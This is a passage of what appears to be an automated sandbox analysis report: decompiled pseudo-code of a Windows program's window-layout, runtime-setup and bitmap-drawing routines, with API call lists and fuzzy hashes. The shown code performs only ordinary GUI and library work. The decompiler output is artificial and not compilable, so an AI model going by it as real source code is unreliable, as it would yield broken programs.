                  				signed int _v44;
                  				struct tagRECT _v64;
                  				struct tagRECT _v80;
                  				struct tagRECT _v96;
                  				signed int _v128;
                  				void* __ebx;
                  				void* __edi;
                  				void* __ebp;
                  				void* _t181;
                  				intOrPtr _t185;
                  				signed int _t187;
                  				intOrPtr _t192;
                  				intOrPtr _t193;
                  				intOrPtr _t198;
                  				intOrPtr* _t199;
                  				signed int _t200;
                  				signed int _t202;
                  				signed int _t203;
                  				signed int _t205;
                  				signed int _t206;
                  				signed int _t211;
                  				void* _t215;
                  				intOrPtr _t223;
                  				intOrPtr _t224;
                  				signed int _t230;
                  				signed int _t240;
                  				signed int _t245;
                  				long _t252;
                  				intOrPtr _t253;
                  				signed int _t259;
                  				signed int _t268;
                  				signed int _t275;
                  				intOrPtr* _t285;
                  				signed int _t286;
                  				signed int _t287;
                  				signed int _t288;
                  				intOrPtr _t295;
                  				signed int* _t306;
                  				intOrPtr _t313;
                  				signed int _t321;
                  				intOrPtr _t323;
                  				signed int _t327;
                  				intOrPtr* _t339;
                  				intOrPtr* _t340;
                  				signed int _t348;
                  				signed int _t349;
                  				intOrPtr* _t350;
                  				signed int _t353;
                  
                  				_t291 = __ecx;
                  				_t285 = __ecx;
                  				_v8 = __ecx;
                  				if(__ecx != 0) {
                  					L2:
                  					E004230B9(_a4, _a8, _a12);
                  					if(IsRectEmpty(_t285 + 0xb4) != 0) {
                  						_t291 = _t285;
                  						_t181 = E0040ED1C(_t285);
                  						if(_t181 == 0) {
                  							goto L1;
                  						} else {
                  							GetClientRect( *(_t181 + 0x20),  &_v80);
                  							_t185 = _v80.right - _v80.left;
                  							_t295 = _v80.bottom - _v80.top;
                  							goto L6;
                  						}
                  					} else {
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						 *((intOrPtr*)( *_t285 + 0x148))( &_v64, _a12);
                  						_t185 = _v64.right - _v64.left;
                  						_t295 = _v64.bottom - _v64.top;
                  						L6:
                  						_v28 = _t295;
                  						_v32 = _t185;
                  						if( *((intOrPtr*)(_t285 + 0xb0)) == 0) {
                  							_v128 = BeginDeferWindowPos( *(_t285 + 0xa4));
                  						} else {
                  							_v128 = _v128 & 0x00000000;
                  						}
                  						_t286 =  *0x44fc20; // 0x2
                  						_t348 =  *0x44fc24; // 0x2
                  						_t339 = _v8;
                  						_t187 = 0;
                  						_t349 =  ~_t348;
                  						_t287 =  ~_t286;
                  						_v44 = _t349;
                  						_v16 = 0;
                  						_v20 = 0;
                  						_v12 = 0;
                  						if( *((intOrPtr*)(_t339 + 0xa4)) <= 0) {
                  							L76:
                  							_t350 = _a4;
                  							if( *((intOrPtr*)(_t339 + 0xb0)) == _t187 && _v128 != _t187) {
                  								EndDeferWindowPos(_v128);
                  							}
                  							SetRectEmpty( &_v96);
                  							 *((intOrPtr*)( *_t339 + 0x148))( &_v96, _a12);
                  							if(_a8 == 0 || _a12 == 0) {
                  								_t192 =  *_t350;
                  								if(_t192 != 0) {
                  									 *_t350 = _v96.left - _v96.right + _t192;
                  								}
                  							}
                  							if(_a8 == 0 || _a12 != 0) {
                  								_t193 =  *((intOrPtr*)(_t350 + 4));
                  								if(_t193 != 0) {
                  									 *((intOrPtr*)(_t350 + 4)) = _v96.top - _v96.bottom + _t193;
                  								}
                  							}
                  							return _t350;
                  						} else {
                  							do {
                  								_t340 = E0041B834(_v8, _v12);
                  								_v24 = _t340;
                  								_t198 =  *((intOrPtr*)(E00415D21(_t287, _v8 + 0x9c, _t340, _v12)));
                  								if(_t340 == 0) {
                  									if(_t198 != 0) {
                  										goto L74;
                  									}
                  									L61:
                  									if(_v16 != 0) {
                  										_t200 = _v16;
                  										_t306 = _a4;
                  										if(_a12 == 0) {
                  											_t287 = _t287 + _t200 -  *0x44fc20;
                  											_t202 =  *_t306;
                  											if(_t202 <= _t287) {
                  												_t202 = _t287;
                  											}
                  											 *_t306 = _t202;
                  											_t203 = _t306[1];
                  											if(_t203 <= _t349) {
                  												_t203 = _t349;
                  											}
                  											_t306[1] = _t203;
                  											_t353 =  *0x44fc24; // 0x2
                  											_t349 =  ~_t353;
                  											_v44 = _t349;
                  										} else {
                  											_t349 = _t349 + _t200 -  *0x44fc24;
                  											_t205 =  *_t306;
                  											_v44 = _t349;
                  											if(_t205 > _t287) {
                  												_t287 = _t205;
                  											}
                  											_t206 = _t306[1];
                  											 *_t306 = _t287;
                  											if(_t206 <= _t349) {
                  												_t206 = _t349;
                  											}
                  											_t306[1] = _t206;
                  											_t288 =  *0x44fc20; // 0x2
                  											_t287 =  ~_t288;
                  										}
                  										_v16 = _v16 & 0x00000000;
                  									}
                  									goto L74;
                  								}
                  								if( *((intOrPtr*)( *_t340 + 0x168))() == 0) {
                  									L58:
                  									if(_v20 != 0) {
                  										goto L74;
                  									}
                  									L59:
                  									 *((intOrPtr*)( *_t340 + 0x16c))( &_v128);
                  									goto L74;
                  								}
                  								_t211 =  *(_t340 + 0x84);
                  								if((_t211 & 0x00000004) == 0 || (_t211 & 0x00000001) == 0) {
                  									asm("sbb eax, eax");
                  									_t215 = ( ~(_t211 & 0x0000a000) & 0xfffffffa) + 0x10;
                  								} else {
                  									_t215 = 6;
                  								}
                  								 *((intOrPtr*)( *_t340 + 0x140))( &_v40, 0xffffffff, _t215);
                  								E0041B557( &_v64, _t287, _t349, _v40, _v36);
                  								GetWindowRect( *(_t340 + 0x20),  &_v80);
                  								E004144FC(_v8,  &_v80);
                  								if(_a12 == 0) {
                  									_t223 = _v80.top;
                  									if(_t223 > _v64.top &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
                  										OffsetRect( &_v64, 0, _t223 - _v64.top);
                  									}
                  									_t224 = _v64.bottom;
                  									_t313 = _v28;
                  									if(_t224 > _t313 &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
                  										_t321 = _t313 - _t224 - _v64.top -  *0x44fc24;
                  										_t245 = _t321;
                  										if(_t321 <= _t349) {
                  											_t245 = _t349;
                  										}
                  										OffsetRect( &_v64, 0, _t245 - _v64.top);
                  									}
                  									if(_v20 == 0) {
                  										if(_v64.top < _v28 -  *0x44fc24 || _v12 <= 0 ||  *((intOrPtr*)(E00415D21(_t287, _v8 + 0x9c, _t340, _v12 - 1))) == 0) {
                  											goto L51;
                  										} else {
                  											goto L37;
                  										}
                  									} else {
                  										_t240 =  *0x44fc24; // 0x2
                  										_v20 = _v20 & 0x00000000;
                  										OffsetRect( &_v64, 0,  ~(_v64.top + _t240));
                  										L51:
                  										if(EqualRect( &_v64,  &_v80) == 0) {
                  											if( *((intOrPtr*)(_v8 + 0xb0)) == 0 && ( *(_t340 + 0x84) & 0x00000001) == 0) {
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t340 = _v24;
                  											}
                  											E0040C357( &_v128,  *(_t340 + 0x20),  &_v64);
                  										}
                  										_t230 = _v40;
                  										_t349 = _v64.top -  *0x44fc24 + _v36;
                  										_v44 = _t349;
                  										if(_v16 > _t230) {
                  											goto L59;
                  										} else {
                  											_v16 = _t230;
                  											goto L58;
                  										}
                  									}
                  								} else {
                  									_t252 = _v80.left;
                  									if(_t252 > _v64.left &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
                  										OffsetRect( &_v64, _t252 - _v64.left, 0);
                  									}
                  									_t253 = _v64.right;
                  									_t323 = _v32;
                  									if(_t253 > _t323 &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
                  										_t327 = _t323 - _t253 -  *0x44fc20 - _v64.left;
                  										_t275 = _t327;
                  										if(_t327 <= _t287) {
                  											_t275 = _t287;
                  										}
                  										OffsetRect( &_v64, _t275 - _v64.left, 0);
                  									}
                  									if(_v20 == 0) {
                  										if(_v64.left < _v32 -  *0x44fc20 || _v12 <= 0 ||  *((intOrPtr*)(E00415D21(_t287, _v8 + 0x9c, _t340, _v12 - 1))) == 0) {
                  											goto L27;
                  										} else {
                  											L37:
                  											_push(1);
                  											_push(0);
                  											E0042598D(_t287, _v8 + 0x9c, 1, _v12);
                  											_v20 = 1;
                  											goto L61;
                  										}
                  									} else {
                  										_t268 =  *0x44fc20; // 0x2
                  										_v20 = _v20 & 0x00000000;
                  										OffsetRect( &_v64,  ~(_t268 + _v64.left), 0);
                  										L27:
                  										if(EqualRect( &_v64,  &_v80) == 0) {
                  											if( *((intOrPtr*)(_v8 + 0xb0)) == 0 && ( *(_t340 + 0x84) & 0x00000001) == 0) {
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												asm("movsd");
                  												_t349 = _v44;
                  												_t340 = _v24;
                  											}
                  											E0040C357( &_v128,  *(_t340 + 0x20),  &_v64);
                  										}
                  										_t259 = _v36;
                  										_t287 = _v40 -  *0x44fc20 + _v64.left;
                  										if(_v16 <= _t259) {
                  											_v16 = _t259;
                  										}
                  										goto L59;
                  									}
                  								}
                  								L74:
                  								_v12 = _v12 + 1;
                  								_t199 = _v8;
                  							} while (_v12 <  *((intOrPtr*)(_t199 + 0xa4)));
                  							_t339 = _t199;
                  							_t187 = 0;
                  							goto L76;
                  						}
                  					}
                  				}
                  				L1:
                  				E00413DD0(_t291);
                  				goto L2;
                  			}

                  APIs
                  • IsRectEmpty.USER32(?), ref: 0041BD8C
                  • GetWindowRect.USER32(?,?), ref: 0041BEB8
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  • GetClientRect.USER32(?,?), ref: 0041BDCE
                  • BeginDeferWindowPos.USER32(?), ref: 0041BDFB
                  • OffsetRect.USER32(?,?,00000000), ref: 0041BEF2
                  • OffsetRect.USER32(?,?,00000000), ref: 0041BF2B
                  • OffsetRect.USER32(?,00000002,00000000), ref: 0041BF52
                  • EqualRect.USER32(?,?), ref: 0041BF60
                  • OffsetRect.USER32(?,00000000,?), ref: 0041C03B
                  • OffsetRect.USER32(?,00000000,?), ref: 0041C074
                  • OffsetRect.USER32(?,00000000,?), ref: 0041C097
                  • EqualRect.USER32(?,?), ref: 0041C0D7
                  • EndDeferWindowPos.USER32(?), ref: 0041C1E8
                  • SetRectEmpty.USER32(?), ref: 0041C1F2
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClientException@8Throw
                  • String ID:
                  • API String ID: 3702718982-0
                  • Opcode ID: 06d616b03f9a624bc04a077d25beb9566651836fc35b65059f93bdd74f78881a
                  • Instruction ID: 207ede8d000545892e6abfd909b87ba6373fdea8484525c380ca6fcb58f066ae
                  • Opcode Fuzzy Hash: 06d616b03f9a624bc04a077d25beb9566651836fc35b65059f93bdd74f78881a
                  • Instruction Fuzzy Hash: FA020531A40209EFCB14DFA8D988BEEBBB5FF08304F14416AE515E7251DB78A985CF58
                  Uniqueness

                  Uniqueness Score: 2.04%

                  C-Code - Quality: 92%
                  			E0042C1FA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				struct HINSTANCE__* _t23;
                  				intOrPtr _t28;
                  				intOrPtr _t32;
                  				intOrPtr _t45;
                  				void* _t46;
                  
                  				_t35 = __ebx;
                  				_push(0xc);
                  				_push(0x447c18);
                  				E00429338(__ebx, __edi, __esi);
                  				_t44 = L"KERNEL32.DLL";
                  				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
                  				if(_t23 == 0) {
                  					_t23 = E0042AE75(_t44);
                  				}
                  				 *(_t46 - 0x1c) = _t23;
                  				_t45 =  *((intOrPtr*)(_t46 + 8));
                  				 *((intOrPtr*)(_t45 + 0x5c)) = 0x442038;
                  				 *((intOrPtr*)(_t45 + 0x14)) = 1;
                  				if(_t23 != 0) {
                  					_t35 = GetProcAddress;
                  					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
                  					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
                  				}
                  				 *((intOrPtr*)(_t45 + 0x70)) = 1;
                  				 *((char*)(_t45 + 0xc8)) = 0x43;
                  				 *((char*)(_t45 + 0x14b)) = 0x43;
                  				 *(_t45 + 0x68) = 0x44c790;
                  				E0042EACE(_t35, 0xd);
                  				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                  				InterlockedIncrement( *(_t45 + 0x68));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				E0042C2CF();
                  				E0042EACE(_t35, 0xc);
                  				 *(_t46 - 4) = 1;
                  				_t28 =  *((intOrPtr*)(_t46 + 0xc));
                  				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
                  				if(_t28 == 0) {
                  					_t32 =  *0x44cd98; // 0x44ccc0
                  					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
                  				}
                  				E0042FE28( *((intOrPtr*)(_t45 + 0x6c)));
                  				 *(_t46 - 4) = 0xfffffffe;
                  				return E0042937D(E0042C2D8());
                  			}









                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00447C18,0000000C,0042C335,00000000,00000000,?,8007000E,0042942E,0042838C,00000000,?,0040B742,8007000E,00000000), ref: 0042C20C
                  • __crt_waiting_on_module_handle.LIBCMT ref: 0042C217
                    • Part of subcall function 0042AE75: Sleep.KERNEL32(000003E8,?,?,0042C15D,KERNEL32.DLL,?,0042F5E4,?,00428386,8007000E,00000000,?,0040B742,8007000E,00000000), ref: 0042AE81
                    • Part of subcall function 0042AE75: GetModuleHandleW.KERNEL32(8007000E,?,?,0042C15D,KERNEL32.DLL,?,0042F5E4,?,00428386,8007000E,00000000,?,0040B742,8007000E,00000000), ref: 0042AE8A
                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0042C240
                  • GetProcAddress.KERNEL32(0000000C,DecodePointer), ref: 0042C250
                  • __lock.LIBCMT ref: 0042C272
                  • InterlockedIncrement.KERNEL32(?), ref: 0042C27F
                  • __lock.LIBCMT ref: 0042C293
                  • ___addlocaleref.LIBCMT ref: 0042C2B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                  • String ID: 8 D$DecodePointer$EncodePointer$KERNEL32.DLL
                  • API String ID: 1028249917-1250515483
                  • Opcode ID: f85e20c151638ceda569236393f2367ce36111e30d9eb07b707b6575cf9c2241
                  • Instruction ID: 272156a274169cf98e5df12e0585ebb411e39ba6d11b4d69191f20877a793770
                  • Opcode Fuzzy Hash: f85e20c151638ceda569236393f2367ce36111e30d9eb07b707b6575cf9c2241
                  • Instruction Fuzzy Hash: 6A110570A44701EEE720DF66A841B4EBBE0AF40314F90446FF499932A1CBB89900CF6C
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 98%
                  			E00414ED8(void* __ebx, void* __edi, int __esi, void* __eflags) {
                  				intOrPtr _t137;
                  				intOrPtr _t139;
                  				intOrPtr _t144;
                  				intOrPtr _t191;
                  				void* _t196;
                  
                  				_t194 = __esi;
                  				_push(0x70);
                  				E0042922B(E00438E01, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t196 - 0x44)) = 0x43e78c;
                  				 *(_t196 - 0x40) = 0;
                  				 *((intOrPtr*)(_t196 - 0x3c)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x38)) = 0;
                  				 *(_t196 - 4) = 0;
                  				 *((intOrPtr*)(_t196 - 0x54)) = 0x43e78c;
                  				 *(_t196 - 0x50) = 0;
                  				 *((intOrPtr*)(_t196 - 0x4c)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x48)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x34)) = 0x43e78c;
                  				 *(_t196 - 0x30) = 0;
                  				 *((intOrPtr*)(_t196 - 0x2c)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x28)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x18)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x1c)) = 0x43ea08;
                  				_t191 = 0x43e9f8;
                  				 *((intOrPtr*)(_t196 - 0x20)) = 0;
                  				 *((intOrPtr*)(_t196 - 0x24)) = 0x43e9f8;
                  				 *(_t196 - 4) = 4;
                  				if(E004149F6(_t196 - 0x44, 0) != 0 && E004149F6(_t196 - 0x54, 0) != 0 && E004149F6(_t196 - 0x34, 0) != 0 && GetObjectW( *( *((intOrPtr*)(_t196 + 8)) + 4), 0x18, _t196 - 0x7c) != 0) {
                  					E00414990( *((intOrPtr*)(_t196 + 0xc)));
                  					if(E004149CC( *((intOrPtr*)(_t196 + 0xc)),  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x6c) & 0x0000ffff,  *(_t196 - 0x6a) & 0x0000ffff, 0) != 0) {
                  						_t194 = 1;
                  						E00414938(0, _t196 - 0x1c, 0x43e9f8, CreateBitmap(8, 8, 1, 1, 0x43ea14));
                  						E004149A6(_t196 - 0x24, _t196 - 0x1c);
                  						E00414990(_t196 - 0x1c);
                  						E004149CC(_t196 - 0x1c,  *(_t196 - 0x78),  *(_t196 - 0x74), 1, 1, 0);
                  						 *((intOrPtr*)(_t196 + 8)) = E00414B47(_t196 - 0x44,  *((intOrPtr*)(_t196 + 8)));
                  						_t137 = E00414B47(_t196 - 0x54, _t196 - 0x1c);
                  						 *((intOrPtr*)(_t196 - 0x14)) = _t137;
                  						if( *((intOrPtr*)(_t196 + 8)) != 0 && _t137 != 0) {
                  							_t139 = E00413F1D(GetPixel( *(_t196 - 0x40), 0, 0), _t196 - 0x44, _t138);
                  							_t194 = BitBlt;
                  							 *((intOrPtr*)(_t196 - 0x10)) = _t139;
                  							E00413F1D(BitBlt( *(_t196 - 0x50), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0xcc0020), _t196 - 0x44, 0xffffff);
                  							E00413F1D(BitBlt( *(_t196 - 0x50), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0xee0086), _t196 - 0x44,  *((intOrPtr*)(_t196 - 0x10)));
                  							_t144 = E00414B47(_t196 - 0x34,  *((intOrPtr*)(_t196 + 0xc)));
                  							 *((intOrPtr*)(_t196 + 0xc)) = _t144;
                  							_t205 = _t144;
                  							if(_t144 != 0) {
                  								 *((intOrPtr*)(_t196 + 0x14)) = E00413F1D(E00413F82(_t144, _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x10))), _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x14)));
                  								 *(_t196 - 0x5c) =  *(_t196 - 0x78);
                  								 *(_t196 - 0x58) =  *(_t196 - 0x74);
                  								 *((intOrPtr*)(_t196 - 0x64)) = 0;
                  								 *((intOrPtr*)(_t196 - 0x60)) = 0;
                  								E00413F1D(E00413F82(E00414186(_t196 - 0x34, _t196 - 0x64, _t196 - 0x24), _t196 - 0x34, _t148), _t196 - 0x34,  *((intOrPtr*)(_t196 + 0x14)));
                  								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0x660046);
                  								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x50), 0, 0, 0x8800c6);
                  								BitBlt( *(_t196 - 0x30), 0, 0,  *(_t196 - 0x78),  *(_t196 - 0x74),  *(_t196 - 0x40), 0, 0, 0x660046);
                  								_t191 = 0x43e9f8;
                  							}
                  							E00414B47(_t196 - 0x34,  *((intOrPtr*)(_t196 + 0xc)));
                  							E00414B47(_t196 - 0x54,  *((intOrPtr*)(_t196 - 0x14)));
                  							E00414B47(_t196 - 0x44,  *((intOrPtr*)(_t196 + 8)));
                  						}
                  					}
                  				}
                  				 *(_t196 - 4) = 3;
                  				 *((intOrPtr*)(_t196 - 0x24)) = _t191;
                  				E00414B63(0, _t196 - 0x24, _t191, _t194, _t205);
                  				 *(_t196 - 4) = 2;
                  				 *((intOrPtr*)(_t196 - 0x1c)) = 0x43ea08;
                  				E00414B63(0, _t196 - 0x1c, _t191, _t194, _t205);
                  				 *(_t196 - 4) = 1;
                  				E004146E5(_t196 - 0x34);
                  				 *(_t196 - 4) = 0;
                  				E004146E5(_t196 - 0x54);
                  				 *(_t196 - 4) =  *(_t196 - 4) | 0xffffffff;
                  				return E00429303(E004146E5(_t196 - 0x44));
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414EDF
                    • Part of subcall function 004149F6: CreateCompatibleDC.GDI32(?), ref: 00414A09
                  • GetObjectW.GDI32(00000004,00000018,?), ref: 00414F6A
                    • Part of subcall function 004149CC: CreateBitmap.GDI32(?,?,?,?,?), ref: 004149E3
                  • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0043EA14), ref: 00414FAF
                    • Part of subcall function 004149A6: CreatePatternBrush.GDI32(?), ref: 004149B9
                    • Part of subcall function 00414990: DeleteObject.GDI32(00000000), ref: 0041499F
                  • GetPixel.GDI32(?,00000000,00000000), ref: 00415016
                    • Part of subcall function 00413F1D: SetBkColor.GDI32(?,?), ref: 00413F3B
                    • Part of subcall function 00413F1D: SetBkColor.GDI32(?,?), ref: 00413F48
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00415043
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 00415067
                    • Part of subcall function 00413F82: SetTextColor.GDI32(?,?), ref: 00413FA0
                    • Part of subcall function 00413F82: SetTextColor.GDI32(?,?), ref: 00413FAD
                    • Part of subcall function 00414186: FillRect.USER32(?,004110CD,?), ref: 0041419C
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 004150F1
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,008800C6), ref: 00415108
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041511B
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ColorCreate$BitmapObjectText$BrushCompatibleDeleteFillH_prolog3PatternPixelRect
                  • String ID: 6AA$BAA
                  • API String ID: 3432338323-1136626083
                  • Opcode ID: 49575fe09fa3281def47276dcee75f14851e47962da65c3dd0b0baef01b08a45
                  • Instruction ID: 5f500491e68d1a194ec1947d030eacbd13a265cd7d1864792aed4f71f97c6faa
                  • Opcode Fuzzy Hash: 49575fe09fa3281def47276dcee75f14851e47962da65c3dd0b0baef01b08a45
                  • Instruction Fuzzy Hash: 4F91E2B1C0010DAADF11EFE2CD819EEBBB9FF48348F20412AB105661A1DB395E55DB64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 93%
                  			E00414C81(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t115;
                  				void* _t121;
                  				intOrPtr _t162;
                  				void* _t170;
                  				void* _t171;
                  
                  				_t171 = __eflags;
                  				_push(0x58);
                  				E0042922B(E00438DBE, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t170 - 0x3c)) = 0x43e78c;
                  				 *(_t170 - 0x38) = 0;
                  				 *((intOrPtr*)(_t170 - 0x34)) = 0;
                  				 *((intOrPtr*)(_t170 - 0x30)) = 0;
                  				 *(_t170 - 4) = 0;
                  				 *((intOrPtr*)(_t170 - 0x4c)) = 0x43e78c;
                  				 *(_t170 - 0x48) = 0;
                  				 *((intOrPtr*)(_t170 - 0x44)) = 0;
                  				 *((intOrPtr*)(_t170 - 0x40)) = 0;
                  				_t162 = 0x43ea08;
                  				 *((intOrPtr*)(_t170 - 0x18)) = 0;
                  				 *((intOrPtr*)(_t170 - 0x1c)) = 0x43ea08;
                  				 *(_t170 - 4) = 2;
                  				_push(GetSysColor(0x14));
                  				E00414C3E(0, _t170 - 0x2c, 0x43ea08, GetSysColor, _t171);
                  				 *(_t170 - 4) = 3;
                  				_push(GetSysColor(0x10));
                  				E00414C3E(0, _t170 - 0x24, 0x43ea08, GetSysColor, _t171);
                  				 *(_t170 - 4) = 4;
                  				if(E004149F6(_t170 - 0x3c, 0) != 0 && E004149F6(_t170 - 0x4c, 0) != 0) {
                  					_t168 =  *((intOrPtr*)(_t170 + 8));
                  					GetObjectW( *( *((intOrPtr*)(_t170 + 8)) + 4), 0x18, _t170 - 0x64);
                  					E00414990( *((intOrPtr*)(_t170 + 0xc)));
                  					if(E004149CC( *((intOrPtr*)(_t170 + 0xc)),  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x54) & 0x0000ffff,  *(_t170 - 0x52) & 0x0000ffff, 0) != 0 && E004149CC(_t170 - 0x1c,  *(_t170 - 0x60),  *(_t170 - 0x5c), 1, 1, 0) != 0) {
                  						 *((intOrPtr*)(_t170 + 8)) = E00414B47(_t170 - 0x3c, _t168);
                  						_t115 = E00414B47(_t170 - 0x4c, _t170 - 0x1c);
                  						 *((intOrPtr*)(_t170 - 0x14)) = _t115;
                  						if( *((intOrPtr*)(_t170 + 8)) != 0 && _t115 != 0) {
                  							 *((intOrPtr*)(_t170 - 0x10)) = E00413F1D(GetPixel( *(_t170 - 0x38), 0, 0), _t170 - 0x3c, _t116);
                  							E00413F1D(BitBlt( *(_t170 - 0x48), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x38), 0, 0, 0xcc0020), _t170 - 0x3c, 0xffffff);
                  							BitBlt( *(_t170 - 0x48), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x38), 0, 0, 0x1100a6);
                  							_t121 = E00414B47(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 0xc)));
                  							_t178 = _t121;
                  							if(_t121 != 0) {
                  								E00413F1D(E00421C10(_t170 - 0x3c, 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *((intOrPtr*)(_t170 + 0x10))), _t170 - 0x3c, 0xffffff);
                  								 *((intOrPtr*)(_t170 + 0xc)) = E00414A99(_t170 - 0x3c, _t170 - 0x2c);
                  								BitBlt( *(_t170 - 0x38), 1, 1,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x48), 0, 0, 0xe20746);
                  								E00414A99(_t170 - 0x3c, _t170 - 0x24);
                  								BitBlt( *(_t170 - 0x38), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x48), 0, 0, 0xe20746);
                  								E00413F1D(E00414A99(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 0xc))), _t170 - 0x3c,  *((intOrPtr*)(_t170 - 0x10)));
                  							}
                  							E00414B47(_t170 - 0x4c,  *((intOrPtr*)(_t170 - 0x14)));
                  							E00414B47(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 8)));
                  							_t162 = 0x43ea08;
                  						}
                  					}
                  				}
                  				 *(_t170 - 4) = 3;
                  				 *((intOrPtr*)(_t170 - 0x24)) = 0x43e9f8;
                  				E00414B63(0, _t170 - 0x24, _t162, 0x43e9f8, _t178);
                  				 *(_t170 - 4) = 2;
                  				 *((intOrPtr*)(_t170 - 0x2c)) = 0x43e9f8;
                  				E00414B63(0, _t170 - 0x2c, _t162, 0x43e9f8, _t178);
                  				 *(_t170 - 4) = 1;
                  				 *((intOrPtr*)(_t170 - 0x1c)) = _t162;
                  				E00414B63(0, _t170 - 0x1c, _t162, 0x43e9f8, _t178);
                  				 *(_t170 - 4) = 0;
                  				E004146E5(_t170 - 0x4c);
                  				 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
                  				return E00429303(E004146E5(_t170 - 0x3c));
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 00414C88
                  • GetSysColor.USER32(00000014), ref: 00414CC6
                    • Part of subcall function 00414C3E: __EH_prolog3.LIBCMT ref: 00414C45
                    • Part of subcall function 00414C3E: CreateSolidBrush.GDI32(?), ref: 00414C60
                  • GetSysColor.USER32(00000010), ref: 00414CD7
                    • Part of subcall function 004149F6: CreateCompatibleDC.GDI32(?), ref: 00414A09
